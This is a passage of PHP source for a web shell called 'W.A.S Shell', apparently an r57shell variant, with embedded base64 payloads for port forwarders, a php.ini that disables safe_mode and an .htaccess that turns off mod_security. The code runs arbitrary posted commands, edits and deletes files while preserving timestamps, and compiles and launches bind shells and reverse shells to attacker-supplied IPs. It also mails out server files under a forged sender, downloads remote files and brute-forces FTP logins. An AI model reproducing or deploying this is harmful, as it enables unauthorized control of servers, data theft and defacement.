lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
$shellvic="QWx1Q2FS==";
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
if($unix)
{
if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
if($safe_mode) { $sysctl = '-'; }
else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
else
{
$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
if(empty($sysctl)) { $sysctl = '-'; }
setcookie('sysctl',$sysctl);
}
}
echo $head;
echo '</head>';
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
}
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).' <b><font color=Red>o--{ <font color=White>W.A.S Shell</font> }--o</font></b></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
if($unix)
{
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
}
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?deface title=\"".$lang[$language.'_text49']."\"><b>deface</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ln title=\"".$lang[$language.'_text49']."\"><b>ln -s all</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?brute title=\"".$lang[$language.'_text49']."\"><b>brute</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text49']."\"><b>users</b></a> ".$rb."<br>";
echo ws(2)."safe_mode: <b>";
echo (($safe_mode)?("<font color=#DF0000>ON</font>"):("<font color=#DF0000>OFF</font>"));
echo "</b>".ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: <b>".(($curl_on)?("<font color=#DF0000>ON</font>"):("<font color=#DF0000>OFF</font>"));
echo "</b>".ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=#DF0000>ON</font>"; } else { echo "<font color=#DF0000>OFF</font>"; }
echo "</b>".ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b>".ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b>".ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b><br>".ws(2);
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=#DF0000>NONE</font></b>";}else{echo "<font color=#DF0000>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333>
<tr><td class=main align=right width=100>';
echo $font;
if($unix){
echo '<font color=White><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo '</td><td class=main>';
echo "<font face=Verdana size=-2 color=#DF0000><b>";
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
echo ws(3).$sysctl."<br>";
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
if(!empty($id)) { echo ws(3).$id."<br>"; }
else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
{
$euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
}
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
echo '<font color=White><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo '</td><td class=main>';
echo "<font face=Verdana size=-2 color=#DF0000><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@getenv("USERNAME")."<br>";
echo ws(3).$dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
$f = '<br>';
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
{
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
err(6+$res);
$_POST['cmd']="";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
{
if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
else
{
$filename = @basename($_POST['loc_file']);
$filedump = @fread($file,@filesize($_POST['loc_file']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
$attach = array(
"name"=>$filename,
"type"=>$mime_type,
"content"=>$filedump
);
if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
err(6+$res);
$_POST['cmd']="";
}
}
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
{
switch($_POST['what'])
{
case 'own':
@chown($_POST['param1'],$_POST['param2']);
break;
case 'grp':
@chgrp($_POST['param1'],$_POST['param2']);
break;
case 'mod':
@chmod($_POST['param1'],intval($_POST['param2'], 8));
break;
}
$_POST['cmd']="";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
{
switch($_POST['what'])
{
case 'file':
if($_POST['action'] == "create")
{
if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
else {
fclose($file);
$_POST['e_name'] = $_POST['mk_name'];
$_POST['cmd']="edit_file";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
}
}
else if($_POST['action'] == "delete")
{
if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
$_POST['cmd']="";
}
break;
case 'dir':
if($_POST['action'] == "create"){
if(mkdir($_POST['mk_name']))
{
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
}
else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
}
else if($_POST['action'] == "delete"){
if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
$_POST['cmd']="";
}
break;
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
{
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."<b>".$_POST['e_name']."</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
fclose($file);
echo "</textarea>";
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
exit();
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
{
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
else {
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
}
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
$_POST['cmd']="ps -aux | grep bd";
}
if (!empty($_POST['php_ini1']))
{
cf("php.ini",$php_ini1);
$_POST['cmd']=" Da write xong php.ini thu? thu? coi di";
}
if (!empty($_POST['htacces']))
{
cf(".htaccess",$htacces);
$_POST['cmd']="Da write xong htaccess thu? thu? coi di ";
}
if (!empty($_POST['file_ini']))
{
cf("ini.php",$sni_res);
$_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt? Da write xong ini.php thu xem ^^!";
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
{
cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/back",$back_connect);
$p2=which("perl");
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
cf("/tmp/back.c",$back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/dp",$datapipe_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
$_POST['cmd']="ps -aux | grep dp";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
{
cf("/tmp/dpc.c",$datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
$_POST['cmd']="ps -aux | grep dpc";
}
if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
if (!empty($HTTP_POST_FILES['userfile']['name']))
{
if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],
$_POST['dir']."/".$nfn)
or print("<font color=#DF0000 face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
}
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
{
switch($_POST['with'])
{
case wget:
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
break;
case fetch:
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
break;
case lynx:
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case links:
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case GET:
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case curl:
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
break;
}
}
if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); }
else
{
if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
else
{
if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
}
}
@ftp_close($connection);
$_POST['cmd'] = "";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); $_POST['cmd'] = ""; }
else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><font color=#DF0000 face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
@ftp_close($connection);
}
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
